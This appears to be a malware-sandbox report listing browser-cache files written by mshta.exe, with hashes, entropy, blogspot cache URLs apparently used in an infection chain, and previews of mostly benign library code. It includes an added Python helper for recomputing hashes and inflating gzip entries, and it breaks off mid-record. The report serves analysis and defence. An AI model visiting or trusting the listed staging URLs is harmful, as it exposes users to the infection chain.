SHA-256: C75C051D62C1419CA30FF20F17720E0DAB937A71CDC2292C67DB5D33F04F62CC
SHA-512: 0F10F1BDF18384EE755B8FD9581DE65185D3E1C70C3774DB7375C295B049AE46CA217DF58FA921B24057E3AB920D78D1811F1C97684951E57EE99F028BA051C1
Malicious: false
Preview: ...........1O.0.....+..1...I....)U.b$...p,..e;...I\..s.;..<.l.U1.6.b54........Ak.q..)..IF...n.I./.j...u......M.d.;........E.......d./.y.`.#.\..L.D..R.-}.wT.*......L.....}Zk..\.G.L*.................^Kk..k40.O.....Cm....k../.......{.....A\H.:).p..E....a..b.?..#l....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\blogin[4].htm
Process: C:\Windows\System32\mshta.exe
File Type: gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Category: dropped
Size (bytes): 288
Entropy (8bit): 7.186277559304474
Encrypted: false
SSDEEP: 6:XtQeYQIDoZZOJgsGJj8FDMV0nCylJiimLrtqBeCw10bPvg3/tz:XdCMZZObmjy9finLRqBrX+/N
MD5: FFA6B2FB79EFA27C78F1B8AE7252D22E
SHA1: 62627448338A017F93D49E3D93D506EF617388C9
SHA-256: E25D0467A39DD17C689F94F2C8697B64FF494AC76F3AD1E3D0E658D748C5D5E7
SHA-512: 721DA29A8A42785A00FD92EE7BA3BBCF32B29EF927A870DCBCBD92297A695AC1151F4432C302F44ADF7C862C7C7C449F26363D1D98EFC82C8DDD0BF07FA18C95
Malicious: false
Preview: ...........1O.0.....+...i$.HR.4%H.*.#....c....i.'1T,...ww.=YzI..U.H.".N.{bU....'.3..T.I..X$...9l.....P..ip....V........_n.t.Z '.C......\...X..u..0.9.A;K..P@9v.3.g.B!...vR..^..q..B!......b=.k...e...E..4.!Z...c..L...uj..m...Gt]w.....q0...S[+..~.?..u...C......C............
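The two mshta.exe cache entries above are tiny (287 and 288 bytes) yet show an 8-bit entropy above 7.1, which is what compressed data looks like rather than a sign of encryption: the Preview bytes start with the gzip magic, and the "from FAT filesystem" part of the file type comes from the OS byte in the gzip header. The following Python is an added triage helper, not code from the report or the sandbox vendor. It recomputes the per-file fields listed in each record (size, Shannon entropy, MD5/SHA1/SHA-256/SHA-512, a coarse magic-based file type) and inflates gzip cache entries so the HTTP body can be read. The sample blob it builds is constructed here; it is not the real content of blogin[4].htm, and the OS-byte descriptions are the RFC 1952 values for the few cases the table needs.

```python
"""Recompute the fields of a sandbox 'dropped files' record and inflate
gzip-compressed browser-cache entries. Added example; the sample blob is
constructed, not the analysed sample's real cache content."""
import gzip
import hashlib
import math
from collections import Counter

# RFC 1952 "OS" header byte (offset 9) -> description as libmagic prints it.
# Only the values needed here; Python's gzip module itself writes 255.
GZIP_OS = {0: "FAT filesystem (MS-DOS, OS/2, NT)", 3: "Unix", 255: "unknown"}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) .. 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> dict:
    """Upper-case hex digests in the order the report lists them."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def is_gzip(data: bytes) -> bool:
    """ID1=0x1f, ID2=0x8b, CM=8 (deflate) is the gzip member header."""
    return data[:3] == b"\x1f\x8b\x08"


def file_type(data: bytes) -> str:
    """Coarse magic-based guess covering the types seen in this table."""
    if is_gzip(data) and len(data) > 9:
        os_byte = data[9]
        return "gzip compressed data, from " + GZIP_OS.get(os_byte, "OS %d" % os_byte)
    bom = data.startswith(b"\xef\xbb\xbf")
    body = data[3:] if bom else data
    if body.lstrip()[:9].lower().startswith((b"<!doctype", b"<html")):
        return "HTML document" + (", UTF-8 Unicode (with BOM) text" if bom else "")
    if all(32 <= b < 127 or b in (9, 10, 13) for b in data):
        return "ASCII text"
    return "data"


def inflate(data: bytes) -> bytes:
    """Decompress a gzip cache entry; raises if the stream is not gzip."""
    return gzip.decompress(data)


def describe(data: bytes) -> dict:
    """Build the same fields a dropped-file record shows, keyed as the report does."""
    rec = {"File Type": file_type(data), "Size (bytes)": len(data),
           "Entropy (8bit)": shannon_entropy(data)}
    rec.update(digests(data))
    return rec


# Constructed stand-in for a gzip-compressed Blogger response (the real
# 287/288-byte entries are not reproduced here).
SAMPLE_BODY = (b"<!DOCTYPE HTML><html dir=\"ltr\"><head>"
               b"<title>Sensitive content warning</title></head>"
               b"<body><script>var next='/p/backbone14.html';</script></body></html>")


def make_sample_blob() -> bytes:
    """gzip the sample body and set the OS byte to 0 (FAT), as in the report."""
    blob = bytearray(gzip.compress(SAMPLE_BODY, mtime=0))
    blob[9] = 0  # OS byte is not covered by the CRC, so decompression still works
    return bytes(blob)


if __name__ == "__main__":
    blob = make_sample_blob()
    for key, value in describe(blob).items():
        print(f"{key}: {value}")
    if is_gzip(blob):
        print("Inflated preview:", inflate(blob)[:80])
```

Run it as-is to see the record for the constructed blob; to check a real cache entry, read the file in binary mode and pass the bytes to describe() and inflate(). Comparing the recomputed digests against the ones in the table is the quickest way to confirm you are looking at the same artifact the sandbox saw.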
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\cookienotice[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):6513
                                                                                                                                                                                                            Entropy (8bit):4.798066280817504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:q54UPzHFcJZ7haKemb/m2GzrzCXAl/MStzo41Pm+YsttcVcbYhyjcso13EZDjiat:q5rPzHgxm2GzaXeMnuzYstyryPhZD9
                                                                                                                                                                                                            MD5:A705132A2174F88E196EC3610D68FAA8
                                                                                                                                                                                                            SHA1:3BAD57A48D973A678FEC600D45933010F6EDC659
                                                                                                                                                                                                            SHA-256:068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
                                                                                                                                                                                                            SHA-512:E947D33E0E9C5E6516F05E0EA696406E4E09B458F85021BC3A217071AE14879B2251E65AEC5D1935CA9AF2433D023356298321564E1A41119D41BE7C2B2D36D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://mainjigijigi123.blogspot.com/js/cookienotice.js
                                                                                                                                                                                                            Preview: /*. Copyright 2014 Google Inc. All rights reserved... Licensed under the Apache License, Version 2.0 (the "License");. you may not use this file except in compliance with the License.. You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. Unless required by applicable law or agreed to in writing, software. distributed under the License is distributed on an "AS IS" BASIS,. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. See the License for the specific language governing permissions and. limitations under the License.. */../*. * For more information on this file, see http://www.cookiechoices.org/. */..(function(window) {.. if (!!window.cookieChoices) {. return window.cookieChoices;. }.. var document = window.document;. // IE8 does not support textContent, so we should fallback to innerText.. var supportsTextContent = 'textContent' in document.body;.. var cookieChoices = (function() {.. var cookieName = 'displayCookie
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\error[1]
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):3247
                                                                                                                                                                                                            Entropy (8bit):5.459946526910292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                                                                                            MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                                                                                            SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                                                                                            SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                                                                                            SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:res://ieframe.dll/error.dlg
                                                                                                                                                                                                            Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\analytics[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):47051
                                                                                                                                                                                                            Entropy (8bit):5.516264124030958
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ryOveCSBZfsnt5XqY/yPndFTkoWY3SoavqVy2rlebYUDTJC6g0stZm:ryJNDfs5hYdFTwY3SorSg0su
                                                                                                                                                                                                            MD5:53EE95B384D866E8692BB1AEF923B763
                                                                                                                                                                                                            SHA1:A82812B87B667D32A8E51514C578A5175EDD94B4
                                                                                                                                                                                                            SHA-256:E441C3E2771625BA05630AB464275136A82C99650EE2145CA5AA9853BEDEB01B
                                                                                                                                                                                                            SHA-512:C1F98A09A102BB1E87BFDF825A725B0E2CC1DBEDB613D1BD9E8FD9D8FD8B145104D5F4CACA44D96DB14AC20F2F51B4C653278BFC87556E7F00E48A5FA6231FAD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                            Preview: (function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var l=this||self,m=function(a,b){a=a.split(".");var c=l;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};var q=function(a,b){for(var c in b)b.hasOwnProperty(c)&&(a[c]=b[c])},r=function(a){for(var b in a)if(a.hasOwnProperty(b))return!0;return!1};var t=/^(?:(?:https?|mailto|ftp):|[^:/?#]*(?:[/?#]|$))/i;var u=window,v=document,w=function(a,b){v.addEventListener?v.addEventListener(a,b,!1):v.attachEvent&&v.attachEvent("on"+a,b)};var x={},y=function(){x.TAGGING=x.TAGGING||[];x.TAGGING[1]=!0};var z=/:[0-9]+$/,A=function(a,b,c){a=a.split("&");for(var d=0;d<a.length;d++){var e=a[d].split("=");if(decodeURIComponent(e[0]).replace(/\+/g," ")===b)return b=e.slice(1).join("="),c?b:decodeURIComponent(b).replace(/\+/g," ")}},D=function(a,b){b&&(b=String(b).toLowerCase());if("p
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\backbone14[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):30326
                                                                                                                                                                                                            Entropy (8bit):5.3810418812269685
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:rGgiP/b3eyHHvPWduwH9s0XGHAfXnVgN3NHRvHp7oS2SY9Y:rGgiP/b3LHH2duwH9jXGHAdgN3NHRvHz
                                                                                                                                                                                                            MD5:CD2F00999ED27853590B2EDC1F10A133
                                                                                                                                                                                                            SHA1:176E305E9F63D46A6CB03A368C3E3E6E2365D567
                                                                                                                                                                                                            SHA-256:2F37F073E8861DC2074E7CF310E108E036936468CB4F12A363AAF1FC31BA5B31
                                                                                                                                                                                                            SHA-512:C195FE3BF9FD2332BAC4AB4EBE5772EB8AFFA34E7B6E3F4D984078EF46BDEA9092E61BF07AA11F453D0729350E09DF0420180CE53AC0A8F7E5137131AA3E1D6F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://startthepartyup.blogspot.com/p/backbone14.html
                                                                                                                                                                                                            Preview: <!DOCTYPE html>.<html class='v2' dir='ltr' lang='en-GB'>.<head>.<link href='https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css' rel='stylesheet' type='text/css'/>.<meta content='width=1100' name='viewport'/>.<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>.<meta content='blogger' name='generator'/>.<link href='https://startthepartyup.blogspot.com/favicon.ico' rel='icon' type='image/x-icon'/>.<link href='https://startthepartyup.blogspot.com/p/backbone14.html' rel='canonical'/>.<link rel="alternate" type="application/atom+xml" title="startthepartyup - Atom" href="https://startthepartyup.blogspot.com/feeds/posts/default" />.<link rel="alternate" type="application/rss+xml" title="startthepartyup - RSS" href="https://startthepartyup.blogspot.com/feeds/posts/default?alt=rss" />.<link rel="service.post" type="application/atom+xml" title="startthepartyup - Atom" href="https://www.blogger.com/feeds/9027821174359424672/posts/default" />. [if IE]><script
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\blogin[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):149589
                                                                                                                                                                                                            Entropy (8bit):5.572386533241481
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:gbSXNDKT4eyooGpV2UAWIGSDHhgoynJ3mYOqLZUf1o4FZeMe4at0YWLGkQYnWe9N:OS9y8heIRg+b4gYzjhW+G
                                                                                                                                                                                                            MD5:84FE5508BBFE1C53A62309FDEFE15D3D
                                                                                                                                                                                                            SHA1:53393903F80154A63BB018D34A22CB2710E533FB
                                                                                                                                                                                                            SHA-256:7E39CB5BA2B39A584E8A3FDC746AF5435381E4C43F9C541F5B3CF8159BF6FE23
                                                                                                                                                                                                            SHA-512:F11A830A4A2E260747D055C293CFF28B55262C0836D226572BA1C8EB8905064440D56AFD37D0BBE03F2361170AAF75D7B8F0AB3F6EEF6079F7F8382D89A2B5A2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html dir="ltr"><head><title>Sensitive content warning</title>.<link href="//fonts.googleapis.com/css?family=Open+Sans:300" rel="stylesheet" type="text/css">.<meta content="adult" name="rating">.<link href="//fonts.googleapis.com/css?family=Open+Sans:300" rel="stylesheet" type="text/css">.<link href="//www.google.com/css/maia.css" rel="stylesheet" type="text/css">.<link href="https://www.blogger.com/static/v1/v-css/281434096-static_pages.css" rel="stylesheet" type="text/css">.<style type="text/css">. @font-face{font-family:'Material Icons Extended';font-style:normal;font-weight:400;src:url(//fonts.gstatic.com/s/materialiconsextended/v64/kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN.eot);}. </style></head>.<body class="lang_en rb"><script type="text/javascript">. window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;. ga('create',. "UA-18003-7",. '
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\blogin[3].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                            Category:dropped
Size (bytes):8192
Entropy (8bit):5.457584462246226
Encrypted:false
SSDEEP:192:puqg3OqSB5cc8rELWyHvEODR2usCnyVas4PV6D8f:EqmbSj0xquahx
MD5:10B58BA496D799C0235A21242608116F
SHA1:85CEF1A13EBCEF0E4C2CF111AF0F7A458FBCA27E
SHA-256:3E550C2C5FF69839A75EFCA67A23A000114E534A853F592A8083AA97D08DF270
SHA-512:A083CCA0589874EB508F499F9563D38799D516D9C9C093213CD6AF55A08407A890E67AF1319695F752AC49A8213E8556FA6AC86E0CC37A2523381B3FFA3AABEC
Malicious:false
Preview: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html dir="ltr"><head><title>Sensitive content warning</title>.<link href="//fonts.googleapis.com/css?family=Open+Sans:300" rel="stylesheet" type="text/css">.<meta content="adult" name="rating">.<link href="//fonts.googleapis.com/css?family=Open+Sans:300" rel="stylesheet" type="text/css">.<link href="//www.google.com/css/maia.css" rel="stylesheet" type="text/css">.<link href="https://www.blogger.com/static/v1/v-css/281434096-static_pages.css" rel="stylesheet" type="text/css">.<style type="text/css">. @font-face{font-family:'Material Icons Extended';font-style:normal;font-weight:400;src:url(//fonts.gstatic.com/s/materialiconsextended/v64/kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN.eot);}. </style></head>.<body class="lang_en rb"><script type="text/javascript">. window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;. ga('create',. "UA-18003-7",. '

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\error[1]
Process:C:\Windows\System32\mshta.exe
File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):6494
Entropy (8bit):5.459946526910292
Encrypted:false
SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDucqKFlZ/P:C0pv+GkduSDl6LRl0pv+GkduSDl6LRa
MD5:267E302C26E032132179DE088213355D
SHA1:7BAB512125E561DE8CB6304F85E1C942F1144C52
SHA-256:CB0BA3CA8EB46FDF94EECE50590E21BC1DF2000C0DF63E06C9E9D91F7EB0EFC9
SHA-512:0C84328BB901154545D9EAF735847AAA9132CC937E3E694C40FA1339FBFC5FC716CD7C2FB4DEDCBCDDBCA1E0D39EC4EF4BBAD0C44F744452E3F2CC805C3016F4
Malicious:false
Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\error[2]
Process:C:\Windows\System32\mshta.exe
File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):3247
Entropy (8bit):5.459946526910292
Encrypted:false
SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
Malicious:false
Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\icon18_edit_allbkg[1].gif
Process:C:\Windows\System32\mshta.exe
File Type:GIF image data, version 89a, 18 x 18
Category:downloaded
Size (bytes):162
Entropy (8bit):6.20718596834588
Encrypted:false
SSDEEP:3:CUS9n21IZClSWEj5QQxlEGsSZpZcYES9XfLvlcDdcpFXn:HS9nSIUlSlNQQjEGsSJcYEowdcrX
MD5:C991641178FF05ADF0D004298B5EAFA9
SHA1:D8F6CE8ECD92B86D49849360F6B81CEB10B4C941
SHA-256:CA9848E6006CFEC8F9FFA29433ADE8152204BDB95579200831C6DC0F53DFF70B
SHA-512:6A845A5DB1F1388DF00F09FDE3787C5A8846C4F1F8041476BC011553821F9BD90FB2937AC10BE45EB5DD1749105CCD4F7339FAA044ECC7386CAF9B59B374EB3B
Malicious:false
IE Cache URL:https://resources.blogblog.com/img/icon18_edit_allbkg.gif
Preview: GIF89a..........j4TSP.%..........)I5.....S(..3&...1..#..!.......,..........O..I...`.......(..1......"N.(.!.3....wH.@..1...... ....ra..R...../..yL `M.J..;

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\icon18_wrench_allbkg[1].png
Process:C:\Windows\System32\mshta.exe
File Type:PNG image data, 18 x 18, 8-bit colormap, non-interlaced
Category:downloaded
Size (bytes):475
Entropy (8bit):7.239750626651385
Encrypted:false
SSDEEP:12:6v/7ElZUJDdwjI5Fa4ep0LPf+veUxQn6/Xh0ptMQsfZhkNTpQEsb7:ZK1dw0etKjfUxQn6/x0DWrETpQZb7
MD5:F617EFFE6D96C15ACFEA8B2E8AAE551F
SHA1:6D676AF11AD2E84B620CCE4D5992B657CB2D8AB6
SHA-256:D172D750493BE64A7ED84DEC1DD2A0D787BA42F78BC694B0858F152C52B6620B
SHA-512:3189A6281AD065848AFC700A47BEA885CD3905DAE11CCB28B88C81D3B28F73F4DFA2D5D1883BB9325DC7729A32AA29B7D1181AE5752DF00F6931624B50571986
Malicious:false
IE Cache URL:https://resources.blogblog.com/img/icon18_wrench_allbkg.png
Preview: .PNG........IHDR.............a.~e....PLTE...... J.4e.............u..l..e..c{.......................................................................Y}.T|....`v.`w............................................................[q.............Eq....__^.......bY....tRNS.@..f....IDATx^M.U..1.@..A(33.Cf....qR...."..@....*.v&.g...X.="6.Xz.$/".3.;.R\....Mb.((...J...R...pK.OY.0...Q.....q.r3..r.v..b..j+..h.r...<._...l.}lY......o%....b..d,l/. ........N...ig.K.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\maia[1].css
Process:C:\Windows\System32\mshta.exe
File Type:UTF-8 Unicode text, with very long lines, with no line terminators
Category:downloaded
Size (bytes):43502
Entropy (8bit):5.583970359912841
Encrypted:false
SSDEEP:768:xwAbmEw+jAJFnSCZ9vWdmIfhjQucISYsU8/F+:bAJFnSC3W1QXISYsU8t+
MD5:9E914FD11C5238C50EBA741A873F0896
SHA1:950316FFEF900CEECCA4CF847C9A8C14231271DA
SHA-256:8684A32D1A10D050A26FC33192EDF427A5F0C6874C590A68D77AE6E0D186BD8A
SHA-512:362B96B27D3286396F53ECE74B1685FA915FC9A73E83F28E782B3F6A2B9F851BA9E37D79D93BD97AB7B3DC3C2D9B66B5E8F81151C8B65A17F4483E1484428E5F
Malicious:false
IE Cache URL:https://www.google.com/css/maia.css
Preview: @media screen,projection,print{html,input,textarea{font-family:arial,sans-serif}html.maia-noto:lang(ar),html.maia-noto:lang(ar) input,html.maia-noto:lang(ar) textarea{font-family:"Noto Naskh Arabic UI",arial,sans-serif}html{line-height:1.54}h5,h6,pre,table,input,textarea,code{font-size:1em}address,abbr,cite{font-style:normal}table{border-collapse:collapse;border-spacing:0}th{text-align:left}[dir=rtl] th{text-align:right}blockquote,q{font-style:italic}html[lang^=ja] blockquote,html[lang^=ja] q,html[lang^=ko] blockquote,html[lang^=ko] q,html[lang^=zh] blockquote,html[lang^=zh] q{font-style:normal}fieldset,iframe,img{border:0}q{quotes:none}sup,sub{line-height:0}html[lang^=ja] .ww,html[lang^=ko] .ww,html[lang^=zh] .ww{display:inline-block}}@media screen,projection{html,h4,h5,h6{font-size:13px}html{background:#fff;color:#444;padding:0 15px}body,fieldset{margin:0}h1,h2,h3,h4,em,i{font-weight:bold}h1,h2,h3,h4,blockquote,q{font-family:"open sans",arial,sans-serif}html.maia-noto:lang(ar) h1,htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\share_buttons_20_3[1].png
Process:C:\Windows\System32\mshta.exe
File Type:PNG image data, 120 x 60, 8-bit/color RGBA, non-interlaced
Category:downloaded
Size (bytes):5080
Entropy (8bit):7.934378623776424
Encrypted:false
SSDEEP:96:fQF0nYNa08BXqtmthO92OamTM5TuqeKJbLcbIsZNB52O2LK:fQoYkLBpc92OamT0TeKxLCIsvB52OCK
MD5:AD9999106D5F550920B586E8E1704E5A
SHA1:93FD02C51166402A41F96509CD0CA3FB917877DD
SHA-256:3829A5B2ADE7CFC416C80B8F3DF71E49E68672875F025D525223978F5CEE3FD3
SHA-512:DE6552632F76A64C26FC0F27CCE741FBB383D60C62A4999A79023D3207B0FAB754CC975B4988B3F65CE481791C434D18D427CE3D98D7838AD0ED05A1D8125519
Malicious:false
IE Cache URL:https://www.blogger.com/img/share_buttons_20_3.png
Preview: .PNG........IHDR...x...<.......~.....IDATh...t.U..3=}l..V<==....m.O7.H; ..-zd.q............a..$..J .a.I.{0!l!I%$.$..}...'...._./.|.U..6Su....z....}U...........S.......H...................Gtt4v...E...o..{QQQ.U............\.r...+.j.*.6..V_...W.c........8..[...(//......p..9|..7R.x...L`k....]Z.~.K.6l.tn.u...4.pMM..9..g.J.....^w.BV...WUU...$........y......M.....D.......Sr,./^.I.W...x.!`.rXX..m.&..f.u.....V.Uj.}X.d..-[..C..h..cbb......y.........2..s...R.....d...qO.#\B=|.....9N..,@xx8..\./..R..5F.....\.....q.....I....r..K.....1c..y#...ptRGG...."$$DJ.....nBB....:.'r.....**..'.....Nq"z...cuL..R.xj.....1.5k.......KN.5k..q.9s........h.....`DD.......*.u..e.......z.L#s..a....`* ...X.|.l$ApVy.L.....l.mp.8I.M...0;.B...9...]...^...R`.q%={yyyr...p...AG.gSl.I....?_:..=..L....@..x...y...?/.....<H.......4==].*....a.'`z.._5P..;...j...9"s...}......z..,...(.Sl+....\.......1.x.#..~\.........K/....'2..wz..o.-.!.={.nN..#./C.hh..pd.m...x..5.L..u..@.\.q

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\st2222[1].htm
Process:C:\Windows\System32\mshta.exe
File Type:HTML document, ASCII text, with very long lines
Category:downloaded
Size (bytes):246010
Entropy (8bit):3.7271987098613337
Encrypted:false
SSDEEP:768:d83eyHHvPWdKqaS2vc26nI2VbzU3Ej46xvfnVgoLS2S7b:d83LHH2dKqx2ZKI2Vc3Ej46vgoLy
MD5:98E5D1F262EBFD9AFC2542E6F9A6A886
SHA1:6802354CA8583B3A63C8E1CB285BA5257384894B
